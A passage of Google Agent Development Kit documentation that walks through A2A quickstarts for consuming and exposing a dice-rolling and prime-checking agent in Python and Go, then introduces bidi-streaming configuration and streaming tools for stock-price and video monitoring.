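    return ", ".join(str(n) for n in primes) + " are prime numbers."


if __name__ == "__main__":
    roll = roll_die(6)
    print(f"Rolled: {roll}")
    print(check_prime([roll]))
```

In the sample, logic of this kind sits behind two different agents: the dice roll runs locally, while the prime check runs on the remote A2A server.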
```text ┌─────────────────┐ ┌──────────────────┐ ┌────────────────────┐ │ Root Agent │───▶│ Roll Agent │ │ Remote Prime │ │ (Local) │ │ (Local) │ │ Agent │ │ │ │ │ │ (localhost:8001) │ │ │───▶│ │◀───│ │ └─────────────────┘ └──────────────────┘ └────────────────────┘ ``` The A2A Basic sample consists of: - **Root Agent** (`root_agent`): The main orchestrator that delegates tasks to specialized sub-agents - **Roll Agent** (`roll_agent`): A local sub-agent that handles dice rolling operations - **Prime Agent** (`prime_agent`): A remote A2A agent that checks if numbers are prime, this agent is running on a separate A2A server ## Exposing Your Agent with the ADK Server The ADK comes with a built-in CLI command, `adk api_server --a2a` to expose your agent using the A2A protocol. In the `a2a_basic` example, you will first need to expose the `check_prime_agent` via an A2A server, so that the local root agent can use it. ### 1. Getting the Sample Code First, make sure you have the necessary dependencies installed: ```bash pip install google-adk[a2a] ``` You can clone and navigate to the [**`a2a_basic`** sample](https://github.com/google/adk-python/tree/main/contributing/samples/a2a_basic) here: ```bash git clone https://github.com/google/adk-python.git ``` As you'll see, the folder structure is as follows: ```text a2a_basic/ ├── remote_a2a/ │ └── check_prime_agent/ │ ├── __init__.py │ ├── agent.json │ └── agent.py ├── README.md ├── __init__.py └── agent.py # local root agent ``` #### Main Agent (`a2a_basic/agent.py`) - **`roll_die(sides: int)`**: Function tool for rolling dice - **`roll_agent`**: Local agent specialized in dice rolling - **`prime_agent`**: Remote A2A agent configuration - **`root_agent`**: Main orchestrator with delegation logic #### Remote Prime Agent (`a2a_basic/remote_a2a/check_prime_agent/`) - **`agent.py`**: Implementation of the prime checking service - **`agent.json`**: Agent card of the A2A agent - **`check_prime(nums: list[int])`**: Prime number 
checking algorithm ### 2. Start the Remote Prime Agent server To show how your ADK agent can consume a remote agent via A2A, you'll first need to start a remote agent server, which will host the prime agent (under `check_prime_agent`). ```bash # Start the remote a2a server that serves the check_prime_agent on port 8001 adk api_server --a2a --port 8001 contributing/samples/a2a_basic/remote_a2a ``` Adding logging for debugging with `--log_level debug` To enable debug-level logging, you can add `--log_level debug` to your `adk api_server`, as in: ```bash adk api_server --a2a --port 8001 contributing/samples/a2a_basic/remote_a2a --log_level debug ``` This will give richer logs for you to inspect when testing your agents. Why use port 8001? In this quickstart, when testing locally, your agents will be using localhost, so the `port` for the A2A server for the exposed agent (the remote, prime agent) must be different from the consuming agent's port. The default port for `adk web` where you will interact with the consuming agent is `8000`, which is why the A2A server is created using a separate port, `8001`. Once executed, you should see something like: ```shell INFO: Started server process [56558] INFO: Waiting for application startup. INFO: Application startup complete. INFO: Uvicorn running on http://127.0.0.1:8001 (Press CTRL+C to quit) ``` ### 3. Look out for the required agent card (`agent-card.json`) of the remote agent A2A Protocol requires that each agent must have an agent card that describes what it does. If someone else has already built the remote A2A agent that you are looking to consume in your agent, then you should confirm that they have an agent card (`agent-card.json`). 
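One lightweight way to confirm that a card is present and usable is to build its URL and check that a few expected fields exist. The sketch below is illustrative only: `WELL_KNOWN_PATH` mirrors the `/.well-known/agent-card.json` path used in these quickstarts, and `EXPECTED_FIELDS` is a hypothetical minimum set picked for this example, not the protocol's authoritative list of required fields.

```python
import json

# Assumption: the well-known path seen in this guide's URLs.
WELL_KNOWN_PATH = "/.well-known/agent-card.json"

# Assumption: a small, illustrative set of fields to look for.
EXPECTED_FIELDS = ("name", "description", "url", "version", "skills")


def agent_card_url(base_url: str) -> str:
    """Join an agent's base URL with the well-known card path."""
    return base_url.rstrip("/") + WELL_KNOWN_PATH


def missing_card_fields(card_json: str) -> list[str]:
    """Return the expected fields that are absent from a card's JSON text."""
    card = json.loads(card_json)
    return [field for field in EXPECTED_FIELDS if field not in card]


if __name__ == "__main__":
    print(agent_card_url("http://localhost:8001/a2a/check_prime_agent"))
    incomplete_card = '{"name": "check_prime_agent", "version": "1.0.0"}'
    print(missing_card_fields(incomplete_card))
```

The JSON text passed to `missing_card_fields` could come from a file on disk or from an HTTP response; fetching is left out so the sketch stays free of network dependencies.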
In the sample, the `check_prime_agent` already has an agent card provided: a2a_basic/remote_a2a/check_prime_agent/agent-card.json ```json { "capabilities": {}, "defaultInputModes": ["text/plain"], "defaultOutputModes": ["application/json"], "description": "An agent specialized in checking whether numbers are prime. It can efficiently determine the primality of individual numbers or lists of numbers.", "name": "check_prime_agent", "skills": [ { "id": "prime_checking", "name": "Prime Number Checking", "description": "Check if numbers in a list are prime using efficient mathematical algorithms", "tags": ["mathematical", "computation", "prime", "numbers"] } ], "url": "http://localhost:8001/a2a/check_prime_agent", "version": "1.0.0" } ``` More info on agent cards in ADK In ADK, you can use a `to_a2a(root_agent)` wrapper which automatically generates an agent card for you. If you're interested in learning more about how to expose your existing agent so others can use it, then please look at the [A2A Quickstart (Exposing)](https://google.github.io/adk-docs/a2a/quickstart-exposing/index.md) tutorial. ### 4. Run the Main (Consuming) Agent ```bash # In a separate terminal, run the adk web server adk web contributing/samples/ ``` #### How it works The main agent uses the `RemoteA2aAgent()` function to consume the remote agent (`prime_agent` in our example). As you can see below, `RemoteA2aAgent()` requires the `name`, `description`, and the URL of the `agent_card`. a2a_basic/agent.py ```python <...code truncated...> from google.adk.agents.remote_a2a_agent import AGENT_CARD_WELL_KNOWN_PATH from google.adk.agents.remote_a2a_agent import RemoteA2aAgent prime_agent = RemoteA2aAgent( name="prime_agent", description="Agent that handles checking if numbers are prime.", agent_card=( f"http://localhost:8001/a2a/check_prime_agent{AGENT_CARD_WELL_KNOWN_PATH}" ), ) <...code truncated> ``` Then, you can simply use the `RemoteA2aAgent` in your agent. 
In this case, `prime_agent` is used as one of the sub-agents in the `root_agent` below:

a2a_basic/agent.py

```python
from google.adk.agents.llm_agent import Agent
from google.genai import types

root_agent = Agent(
    model="gemini-2.0-flash",
    name="root_agent",
    instruction=""" """,
    global_instruction=(
        "You are DicePrimeBot, ready to roll dice and check prime numbers."
    ),
    sub_agents=[roll_agent, prime_agent],
    tools=[example_tool],
    generate_content_config=types.GenerateContentConfig(
        safety_settings=[
            types.SafetySetting(  # avoid false alarm about rolling dice.
                category=types.HarmCategory.HARM_CATEGORY_DANGEROUS_CONTENT,
                threshold=types.HarmBlockThreshold.OFF,
            ),
        ]
    ),
)
```

## Example Interactions

Once both your main and remote agents are running, you can interact with the root agent to see how it calls the remote agent via A2A:

**Simple Dice Rolling:** This interaction uses a local agent, the Roll Agent:

```text
User: Roll a 6-sided die
Bot: I rolled a 4 for you.
```

**Prime Number Checking:** This interaction uses a remote agent via A2A, the Prime Agent:

```text
User: Is 7 a prime number?
Bot: Yes, 7 is a prime number.
```

**Combined Operations:** This interaction uses both the local Roll Agent and the remote Prime Agent:

```text
User: Roll a 10-sided die and check if it's prime
Bot: I rolled an 8 for you.
Bot: 8 is not a prime number.
```

## Next Steps

Now that you have created an agent that's using a remote agent via an A2A server, the next step is to learn how to expose your own agent.

- [**A2A Quickstart (Exposing)**](https://google.github.io/adk-docs/a2a/quickstart-exposing/index.md): Learn how to expose your existing agent so that other agents can use it via the A2A Protocol.

# Quickstart: Exposing a remote agent via A2A

Supported in ADK: Go (Experimental)

This quickstart covers the most common starting point for any developer: **"I have an agent. How do I expose it so that other agents can use my agent via A2A?"**.
This is crucial for building complex multi-agent systems where different agents need to collaborate and interact. ## Overview This sample demonstrates how you can easily expose an ADK agent so that it can be then consumed by another agent using the A2A Protocol. In Go, you expose an agent by using the A2A launcher, which dynamically generates an agent card for you. ```text ┌─────────────────┐ ┌───────────────────────────────┐ │ Root Agent │ A2A Protocol │ A2A-Exposed Check Prime Agent │ │ │────────────────────────────▶│ (localhost: 8001) │ └─────────────────┘ └───────────────────────────────┘ ``` The sample consists of : - **Remote Prime Agent** (`remote_a2a/check_prime_agent/main.go`): This is the agent that you want to expose so that other agents can use it via A2A. It is an agent that handles prime number checking. It becomes exposed using the A2A launcher. - **Root Agent** (`main.go`): A simple agent that is just calling the remote prime agent. ## Exposing the Remote Agent with the A2A Launcher You can take an existing agent built using the Go ADK and make it A2A-compatible by using the A2A launcher. ### 1. Getting the Sample Code First, make sure you have Go installed and your environment is set up. You can clone and navigate to the [**`a2a_basic`** sample](https://github.com/google/adk-docs/tree/main/examples/go/a2a_basic) here: ```bash cd examples/go/a2a_basic ``` As you'll see, the folder structure is as follows: ```text a2a_basic/ ├── remote_a2a/ │ └── check_prime_agent/ │ └── main.go # Remote Prime Agent ├── go.mod ├── go.sum └── main.go # Root agent ``` #### Root Agent (`a2a_basic/main.go`) - **`newRootAgent`**: A local agent that connects to the remote A2A service. #### Remote Prime Agent (`a2a_basic/remote_a2a/check_prime_agent/main.go`) - **`checkPrimeTool`**: Function for prime number checking. - **`main`**: The main function that creates the agent and starts the A2A server. ### 2. 
Start the Remote A2A Agent server

You can now start the remote agent server, which will host the `check_prime_agent`:

```bash
# Start the remote agent
go run remote_a2a/check_prime_agent/main.go
```

Once executed, you should see something like:

```shell
2025/11/06 11:00:19 Starting A2A prime checker server on port 8001
2025/11/06 11:00:19 Starting the web server: &{port:8001}
2025/11/06 11:00:19
2025/11/06 11:00:19 Web servers starts on http://localhost:8001
2025/11/06 11:00:19 a2a: you can access A2A using jsonrpc protocol: http://localhost:8001
```

### 3. Check that your remote agent is running

You can check that your agent is up and running by visiting the agent card that was auto-generated by the A2A launcher, at `http://localhost:8001/.well-known/agent-card.json`. You should see the contents of the agent card.

### 4. Run the Main (Consuming) Agent

Now that your remote agent is running, you can run the main agent.

```bash
# In a separate terminal, run the main agent
go run main.go
```

#### How it works

The remote agent is exposed using the A2A launcher in the `main` function. The launcher takes care of starting the server and generating the agent card.

remote_a2a/check_prime_agent/main.go

```go
func main() {
	ctx := context.Background()

	primeTool, err := functiontool.New(functiontool.Config{
		Name:        "prime_checking",
		Description: "Check if numbers in a list are prime using efficient mathematical algorithms",
	}, checkPrimeTool)
	if err != nil {
		log.Fatalf("Failed to create prime_checking tool: %v", err)
	}

	model, err := gemini.NewModel(ctx, "gemini-2.0-flash", &genai.ClientConfig{})
	if err != nil {
		log.Fatalf("Failed to create model: %v", err)
	}

	primeAgent, err := llmagent.New(llmagent.Config{
		Name:        "check_prime_agent",
		Description: "check prime agent that can check whether numbers are prime.",
		Instruction: `
			You check whether numbers are prime.
			When checking prime numbers, call the check_prime tool with a list of integers. Be sure to pass in a list of integers. You should never pass in a string.
You should not rely on the previous history on prime results. `, Model: model, Tools: []tool.Tool{primeTool}, }) if err != nil { log.Fatalf("Failed to create agent: %v", err) } // Create launcher. The a2a.NewLauncher() will dynamically generate the agent card. port := 8001 webLauncher := web.NewLauncher(a2a.NewLauncher()) _, err = webLauncher.Parse([]string{ "--port", strconv.Itoa(port), "a2a", "--a2a_agent_url", "http://localhost:" + strconv.Itoa(port), }) if err != nil { log.Fatalf("launcher.Parse() error = %v", err) } // Create ADK config config := &launcher.Config{ AgentLoader: agent.NewSingleLoader(primeAgent), SessionService: session.InMemoryService(), } log.Printf("Starting A2A prime checker server on port %d\n", port) // Run launcher if err := webLauncher.Run(context.Background(), config); err != nil { log.Fatalf("webLauncher.Run() error = %v", err) } } ``` ## Example Interactions Once both services are running, you can interact with the root agent to see how it calls the remote agent via A2A: **Prime Number Checking:** This interaction uses a remote agent via A2A, the Prime Agent: ```text User: roll a die and check if it's a prime Bot: Okay, I will first roll a die and then check if the result is a prime number. Bot calls tool: transfer_to_agent with args: map[agent_name:roll_agent] Bot calls tool: roll_die with args: map[sides:6] Bot calls tool: transfer_to_agent with args: map[agent_name:prime_agent] Bot calls tool: prime_checking with args: map[nums:[3]] Bot: 3 is a prime number. ... ``` ## Next Steps Now that you have created an agent that's exposing a remote agent via an A2A server, the next step is to learn how to consume it from another agent. - [**A2A Quickstart (Consuming)**](https://google.github.io/adk-docs/a2a/quickstart-consuming-go/index.md): Learn how your agent can use other agents using the A2A Protocol. 
# Quickstart: Exposing a remote agent via A2A Supported in ADKPythonExperimental This quickstart covers the most common starting point for any developer: **"I have an agent. How do I expose it so that other agents can use my agent via A2A?"**. This is crucial for building complex multi-agent systems where different agents need to collaborate and interact. ## Overview This sample demonstrates how you can easily expose an ADK agent so that it can be then consumed by another agent using the A2A Protocol. There are two main ways to expose an ADK agent via A2A. - **by using the `to_a2a(root_agent)` function**: use this function if you just want to convert an existing agent to work with A2A, and be able to expose it via a server through `uvicorn`, instead of `adk deploy api_server`. This means that you have tighter control over what you want to expose via `uvicorn` when you want to productionize your agent. Furthermore, the `to_a2a()` function auto-generates an agent card based on your agent code. - **by creating your own agent card (`agent.json`) and hosting it using `adk api_server --a2a`**: There are two main benefits of using this approach. First, `adk api_server --a2a` works with `adk web`, making it easy to use, debug, and test your agent. Second, with `adk api_server`, you can specify a parent folder with multiple, separate agents. Those agents that have an agent card (`agent.json`), will automatically be usable via A2A by other agents through the same server. However, you will need to create your own agent cards. To create an agent card, you can follow the [A2A Python tutorial](https://a2a-protocol.org/latest/tutorials/python/1-introduction/). This quickstart will focus on `to_a2a()`, as it is the easiest way to expose your agent and will also autogenerate the agent card behind-the-scenes. 
If you'd like to use the `adk api_server` approach, you can see it being used in the [A2A Quickstart (Consuming) documentation](https://google.github.io/adk-docs/a2a/quickstart-consuming/index.md).

```text
Before:
                                                ┌────────────────────┐
                                                │ Hello World Agent  │
                                                │  (Python Object)   │
                                                │ without agent card │
                                                └────────────────────┘

                                                          │
                                                          │ to_a2a()
                                                          ▼

After:
┌────────────────┐                             ┌───────────────────────────────┐
│   Root Agent   │       A2A Protocol          │ A2A-Exposed Hello World Agent │
│(RemoteA2aAgent)│────────────────────────────▶│       (localhost: 8001)       │
│(localhost:8000)│                             └───────────────────────────────┘
└────────────────┘
```

The sample consists of:

- **Remote Hello World Agent** (`remote_a2a/hello_world/agent.py`): This is the agent that you want to expose so that other agents can use it via A2A. It is an agent that handles dice rolling and prime number checking. It becomes exposed using the `to_a2a()` function and is served using `uvicorn`.
- **Root Agent** (`agent.py`): A simple agent that is just calling the remote Hello World agent.

## Exposing the Remote Agent with the `to_a2a(root_agent)` function

You can take an existing agent built using ADK and make it A2A-compatible by simply wrapping it using the `to_a2a()` function.
For example, if you have an agent like the following defined in `root_agent`: ```python # Your agent code here root_agent = Agent( model='gemini-2.0-flash', name='hello_world_agent', <...your agent code...> ) ``` Then you can make it A2A-compatible simply by using `to_a2a(root_agent)`: ```python from google.adk.a2a.utils.agent_to_a2a import to_a2a # Make your agent A2A-compatible a2a_app = to_a2a(root_agent, port=8001) ``` The `to_a2a()` function will even auto-generate an agent card in-memory behind-the-scenes by [extracting skills, capabilities, and metadata from the ADK agent](https://github.com/google/adk-python/blob/main/src/google/adk/a2a/utils/agent_card_builder.py), so that the well-known agent card is made available when the agent endpoint is served using `uvicorn`. You can also provide your own agent card by using the `agent_card` parameter. The value can be an `AgentCard` object or a path to an agent card JSON file. **Example with an `AgentCard` object:** ```python from google.adk.a2a.utils.agent_to_a2a import to_a2a from a2a.types import AgentCard # Define A2A agent card my_agent_card = AgentCard( name="file_agent", url="http://example.com", description="Test agent from file", version="1.0.0", capabilities={}, skills=[], defaultInputModes=["text/plain"], defaultOutputModes=["text/plain"], supportsAuthenticatedExtendedCard=False, ) a2a_app = to_a2a(root_agent, port=8001, agent_card=my_agent_card) ``` **Example with a path to a JSON file:** ```python from google.adk.a2a.utils.agent_to_a2a import to_a2a # Load A2A agent card from a file a2a_app = to_a2a(root_agent, port=8001, agent_card="/path/to/your/agent-card.json") ``` Now let's dive into the sample code. ### 1. 
Getting the Sample Code First, make sure you have the necessary dependencies installed: ```bash pip install google-adk[a2a] ``` You can clone and navigate to the [**a2a_root** sample](https://github.com/google/adk-python/tree/main/contributing/samples/a2a_root) here: ```bash git clone https://github.com/google/adk-python.git ``` As you'll see, the folder structure is as follows: ```text a2a_root/ ├── remote_a2a/ │ └── hello_world/ │ ├── __init__.py │ └── agent.py # Remote Hello World Agent ├── README.md └── agent.py # Root agent ``` #### Root Agent (`a2a_root/agent.py`) - **`root_agent`**: A `RemoteA2aAgent` that connects to the remote A2A service - **Agent Card URL**: Points to the well-known agent card endpoint on the remote server #### Remote Hello World Agent (`a2a_root/remote_a2a/hello_world/agent.py`) - **`roll_die(sides: int)`**: Function tool for rolling dice with state management - **`check_prime(nums: list[int])`**: Async function for prime number checking - **`root_agent`**: The main agent with comprehensive instructions - **`a2a_app`**: The A2A application created using `to_a2a()` utility ### 2. Start the Remote A2A Agent server You can now start the remote agent server, which will host the `a2a_app` within the hello_world agent: ```bash # Ensure current working directory is adk-python/ # Start the remote agent using uvicorn uvicorn contributing.samples.a2a_root.remote_a2a.hello_world.agent:a2a_app --host localhost --port 8001 ``` Why use port 8001? In this quickstart, when testing locally, your agents will be using localhost, so the `port` for the A2A server for the exposed agent (the remote, prime agent) must be different from the consuming agent's port. The default port for `adk web` where you will interact with the consuming agent is `8000`, which is why the A2A server is created using a separate port, `8001`. Once executed, you should see something like: ```shell INFO: Started server process [10615] INFO: Waiting for application startup. 
INFO:     Application startup complete.
INFO:     Uvicorn running on http://localhost:8001 (Press CTRL+C to quit)
```

### 3. Check that your remote agent is running

You can check that your agent is up and running by visiting the agent card that was auto-generated earlier as part of your `to_a2a()` function in `a2a_root/remote_a2a/hello_world/agent.py`, at `http://localhost:8001/.well-known/agent-card.json`.

You should see the contents of the agent card, which should look like:

```json
{"capabilities":{},"defaultInputModes":["text/plain"],"defaultOutputModes":["text/plain"],"description":"hello world agent that can roll a dice of 8 sides and check prime numbers.","name":"hello_world_agent","protocolVersion":"0.2.6","skills":[{"description":"hello world agent that can roll a dice of 8 sides and check prime numbers. \n I roll dice and answer questions about the outcome of the dice rolls.\n I can roll dice of different sizes.\n I can use multiple tools in parallel by calling functions in parallel(in one request and in one round).\n It is ok to discuss previous dice roles, and comment on the dice rolls.\n When I are asked to roll a die, I must call the roll_die tool with the number of sides. Be sure to pass in an integer. Do not pass in a string.\n I should never roll a die on my own.\n When checking prime numbers, call the check_prime tool with a list of integers. Be sure to pass in a list of integers. I should never pass in a string.\n I should not check prime numbers before calling the tool.\n When I are asked to roll a die and check prime numbers, I should always make the following two function calls:\n 1. I should first call the roll_die tool to get a roll. Wait for the function response before calling the check_prime tool.\n 2. After I get the function response from roll_die tool, I should call the check_prime tool with the roll_die result.\n 2.1 If user asks I to check primes based on previous rolls, make sure I include the previous rolls in the list.\n 3.
When I respond, I must include the roll_die result from step 1.\n I should always perform the previous 3 steps when asking for a roll and checking prime numbers.\n I should not rely on the previous history on prime results.\n ","id":"hello_world_agent","name":"model","tags":["llm"]},{"description":"Roll a die and return the rolled result.\n\nArgs:\n sides: The integer number of sides the die has.\n tool_context: the tool context\nReturns:\n An integer of the result of rolling the die.","id":"hello_world_agent-roll_die","name":"roll_die","tags":["llm","tools"]},{"description":"Check if a given list of numbers are prime.\n\nArgs:\n nums: The list of numbers to check.\n\nReturns:\n A str indicating which number is prime.","id":"hello_world_agent-check_prime","name":"check_prime","tags":["llm","tools"]}],"supportsAuthenticatedExtendedCard":false,"url":"http://localhost:8001","version":"0.0.1"}
```

### 4. Run the Main (Consuming) Agent

Now that your remote agent is running, you can launch the dev UI and select "a2a_root" as your agent.

```bash
# In a separate terminal, run the adk web server
adk web contributing/samples/
```

To open the adk web server, go to `http://localhost:8000`.

## Example Interactions

Once both services are running, you can interact with the root agent to see how it calls the remote agent via A2A:

**Simple Dice Rolling:** This interaction uses a local agent, the Roll Agent:

```text
User: Roll a 6-sided die
Bot: I rolled a 4 for you.
```

**Prime Number Checking:** This interaction uses a remote agent via A2A, the Prime Agent:

```text
User: Is 7 a prime number?
Bot: Yes, 7 is a prime number.
```

**Combined Operations:** This interaction uses both the local Roll Agent and the remote Prime Agent:

```text
User: Roll a 10-sided die and check if it's prime
Bot: I rolled an 8 for you.
Bot: 8 is not a prime number.
```

## Next Steps

Now that you have created an agent that's exposing a remote agent via an A2A server, the next step is to learn how to consume it from another agent.
- [**A2A Quickstart (Consuming)**](https://google.github.io/adk-docs/a2a/quickstart-consuming/index.md): Learn how your agent can use other agents using the A2A Protocol. # Bidi-streaming (live) in ADK Supported in ADKPython v0.5.0Experimental Bidirectional (Bidi) streaming (live) in ADK adds the low-latency bidirectional voice and video interaction capability of [Gemini Live API](https://ai.google.dev/gemini-api/docs/live) to AI agents. With bidi-streaming, or live, mode, you can provide end users with the experience of natural, human-like voice conversations, including the ability for the user to interrupt the agent's responses with voice commands. Agents with streaming can process text, audio, and video inputs, and they can provide text and audio output. - **Quickstart (Bidi-streaming)** ______________________________________________________________________ In this quickstart, you'll build a simple agent and use streaming in ADK to implement low-latency and bidirectional voice and video communication. - [Quickstart (Bidi-streaming)](https://google.github.io/adk-docs/get-started/streaming/quickstart-streaming/index.md) - **Bidi-streaming Demo Application** ______________________________________________________________________ A production-ready reference implementation showcasing ADK bidirectional streaming with multimodal support (text, audio, image). This FastAPI-based demo demonstrates real-time WebSocket communication, automatic transcription, tool calling with Google Search, and complete streaming lifecycle management. This demo is extensively referenced throughout the development guide series. - [ADK Bidi-streaming Demo](https://github.com/google/adk-samples/tree/main/python/agents/bidi-demo) - **Blog post: ADK Bidi-streaming Visual Guide** ______________________________________________________________________ A visual guide to real-time multimodal AI agent development with ADK Bidi-streaming. 
This article provides intuitive diagrams and illustrations to help you understand how Bidi-streaming works and how to build interactive AI agents. - [Blog post: ADK Bidi-streaming Visual Guide](https://medium.com/google-cloud/adk-bidi-streaming-a-visual-guide-to-real-time-multimodal-ai-agent-development-62dd08c81399) - **Bidi-streaming development guide series** ______________________________________________________________________ A series of articles for diving deeper into the Bidi-streaming development with ADK. You can learn basic concepts and use cases, the core API, and end-to-end application design. - [Part 1: Introduction to ADK Bidi-streaming](https://google.github.io/adk-docs/streaming/dev-guide/part1/index.md) - Fundamentals of Bidi-streaming, Live API technology, ADK architecture components, and complete application lifecycle with FastAPI examples - [Part 2: Sending messages with LiveRequestQueue](https://google.github.io/adk-docs/streaming/dev-guide/part2/index.md) - Upstream message flow, sending text/audio/video, activity signals, and concurrency patterns - [Part 3: Event handling with run_live()](https://google.github.io/adk-docs/streaming/dev-guide/part3/index.md) - Processing events, handling text/audio/transcriptions, automatic tool execution, and multi-agent workflows - [Part 4: Understanding RunConfig](https://google.github.io/adk-docs/streaming/dev-guide/part4/index.md) - Response modalities, streaming modes, session management, session resumption, context window compression, and quota management - [Part 5: How to Use Audio, Image and Video](https://google.github.io/adk-docs/streaming/dev-guide/part5/index.md) - Audio specifications, model architectures, audio transcription, voice activity detection, and proactive/affective dialog features - **Streaming Tools** ______________________________________________________________________ Streaming tools allow tools (functions) to stream intermediate results back to agents and agents can respond to 
those intermediate results. For example, we can use streaming tools to monitor changes in a stock price and have the agent react to them. Another example is having the agent monitor a video stream and report any changes in it. - [Streaming Tools](https://google.github.io/adk-docs/streaming/streaming-tools/index.md)
- **Blog post: Google ADK + Vertex AI Live API** ______________________________________________________________________ This article shows how to use Bidi-streaming (live) in ADK for real-time audio/video streaming. It offers a Python server example using LiveRequestQueue to build custom, interactive AI agents. - [Blog post: Google ADK + Vertex AI Live API](https://medium.com/google-cloud/google-adk-vertex-ai-live-api-125238982d5e)
- **Blog post: Supercharge ADK Development with Claude Code Skills** ______________________________________________________________________ This article demonstrates how to use Claude Code Skills to accelerate ADK development, with an example of building a Bidi-streaming chat app. Learn how to leverage AI-powered coding assistance to build better agents faster. - [Blog post: Supercharge ADK Development with Claude Code Skills](https://medium.com/@kazunori279/supercharge-adk-development-with-claude-code-skills-d192481cbe72)

# Configuring streaming behaviour

Supported in ADK: Python v0.5.0 (Experimental)

You can configure live (streaming) agents through [RunConfig](https://github.com/google/adk-python/blob/main/src/google/adk/agents/run_config.py), which you pass to [Runner.run_live(...)](https://github.com/google/adk-python/blob/main/src/google/adk/runners.py). For example, to set the voice configuration, use `speech_config`.
```python
from google.adk.agents.run_config import RunConfig
from google.genai import types as genai_types

# Select a prebuilt voice for the agent's audio output.
voice_config = genai_types.VoiceConfig(
    prebuilt_voice_config=genai_types.PrebuiltVoiceConfigDict(
        voice_name='Aoede'
    )
)
speech_config = genai_types.SpeechConfig(voice_config=voice_config)
run_config = RunConfig(speech_config=speech_config)

# `runner` is an existing Runner; the other arguments are elided here.
runner.run_live(
    ...,
    run_config=run_config,
)
```

# Streaming Tools

Supported in ADK: Python v0.5.0 (Experimental)

Streaming tools allow tools (functions) to stream intermediate results back to agents, and agents can respond to those intermediate results. For example, we can use streaming tools to monitor changes in a stock price and have the agent react to them. Another example is having the agent monitor a video stream and report any changes in it.

Info

This is only supported in streaming (live) agents/APIs.

To define a streaming tool, you must adhere to the following:

1. **Asynchronous Function:** The tool must be an `async` Python function.
1. **AsyncGenerator Return Type:** The function must be typed to return an `AsyncGenerator`. The first type parameter to `AsyncGenerator` is the type of the data you `yield` (e.g., `str` for text messages, or a custom object for structured data). The second type parameter is typically `None` if the generator doesn't receive values via `send()`.

We support two types of streaming tools:

- Simple type. Streaming tools of this type take only non-video/non-audio inputs; they do not receive the video or audio streams that you feed to adk web or adk runner.
- Video streaming tools. These work only in video streaming, and the video stream (the stream that you feed to adk web or adk runner) is passed into the function.

Now let's define an agent that can monitor both stock price changes and video stream changes.
```python
import asyncio
from typing import AsyncGenerator

from google.adk.agents import LiveRequestQueue
from google.adk.agents.llm_agent import Agent
from google.adk.tools.function_tool import FunctionTool
from google.genai import Client
from google.genai import types as genai_types


async def monitor_stock_price(stock_symbol: str) -> AsyncGenerator[str, None]:
    """Monitor the price of the given stock_symbol continuously, streaming alerts asynchronously."""
    print(f"Start monitor stock price for {stock_symbol}!")

    # Let's mock stock price changes as (seconds to wait, new price) pairs.
    for delay, price in [(4, 300), (4, 400), (20, 900), (20, 500)]:
        await asyncio.sleep(delay)
        price_alert = f"the price for {stock_symbol} is {price}"
        yield price_alert
        print(price_alert)


# For video streaming, `input_stream: LiveRequestQueue` is a required, reserved
# parameter that ADK uses to pass the video stream in.
async def monitor_video_stream(
    input_stream: LiveRequestQueue,
) -> AsyncGenerator[str, None]:
    """Monitor how many people are in the video streams."""
    print("start monitor_video_stream!")
    client = Client(vertexai=False)
    prompt_text = (
        "Count the number of people in this image. Just respond with a numeric"
        " number."
    )
    last_count = None
    while True:
        last_valid_req = None
        print("Start monitoring loop")

        # Use this loop to pull the latest images and discard the old ones.
        while input_stream._queue.qsize() != 0:
            live_req = await input_stream.get()

            if live_req.blob is not None and live_req.blob.mime_type == "image/jpeg":
                last_valid_req = live_req

        # If we found a valid image, process it.
        if last_valid_req is not None:
            print("Processing the most recent frame from the queue")

            # Create an image part using the blob's data and mime type.
            image_part = genai_types.Part.from_bytes(
                data=last_valid_req.blob.data,
                mime_type=last_valid_req.blob.mime_type,
            )

            contents = genai_types.Content(
                role="user",
                parts=[image_part, genai_types.Part.from_text(text=prompt_text)],
            )

            # Call the model through the async client so the event loop is
            # not blocked while waiting for the response.
            response = await client.aio.models.generate_content(
                model="gemini-2.0-flash-exp",
                contents=contents,
                config=genai_types.GenerateContentConfig(
                    system_instruction=(
                        "You are a helpful video analysis assistant. You can count"
                        " the number of people in this image or video. Just respond"
                        " with a numeric number."
                    )
                ),
            )
            count_text = response.candidates[0].content.parts[0].text
            if not last_count:
                # First reading: record it as the baseline without alerting.
                last_count = count_text
            elif last_count != count_text:
                # The count changed: remember it and yield the new count as
                # text, matching the declared AsyncGenerator[str, None] type.
                last_count = count_text
                yield count_text
                print("response:", response)

        # Wait before checking for new images.
        await asyncio.sleep(0.5)


# Use this exact function to help ADK stop your streaming tools when requested.
# For example, if we want to stop `monitor_stock_price`, then the agent will
# invoke this function with stop_streaming(function_name=monitor_stock_price).
def stop_streaming(function_name: str):
    """Stop the streaming

    Args:
      function_name: The name of the streaming function to stop.
    """
    pass


root_agent = Agent(
    model="gemini-2.0-flash-exp",
    name="video_streaming_agent",
    instruction="""
      You are a monitoring agent. You can do video monitoring and stock price monitoring
      using the provided tools/functions.
      When users want to monitor a video stream,
      You can use monitor_video_stream function to do that. When monitor_video_stream
      returns the alert, you should tell the users.
      When users want to monitor a stock price, you can use monitor_stock_price.
      Don't ask too many questions. Don't be too talkative.
    """,
    tools=[
        monitor_video_stream,
        monitor_stock_price,
        FunctionTool(stop_streaming),
    ],
)
```

Here are some sample queries to test:

- Help me monitor the stock price for $XYZ stock.
- Help me monitor how many people are there in the video stream.

# Part 1: Introduction to ADK Bidi-streaming

Google's Agent Development Kit ([ADK](https://google.github.io/adk-docs/)) provides a production-ready framework for building Bidi-streaming applications with Gemini models. This guide introduces ADK's streaming architecture, which enables real-time, two-way communication between users and AI agents through multimodal channels (text, audio, video).

**What you'll learn**: This part covers the fundamentals of Bidi-streaming, the underlying Live API technology (Gemini Live API and Vertex AI Live API), ADK's architectural components (`LiveRequestQueue`, `Runner`, `Agent`), and a complete FastAPI implementation example. You'll understand how ADK handles session management, tool orchestration, and platform abstraction, reducing months of infrastructure development to declarative configuration.

## ADK Bidi-streaming Demo

To help you understand the concepts in this guide, we provide a working demo application that showcases ADK bidirectional streaming in action. This FastAPI-based demo implements the complete streaming lifecycle with a practical, real-world architecture.
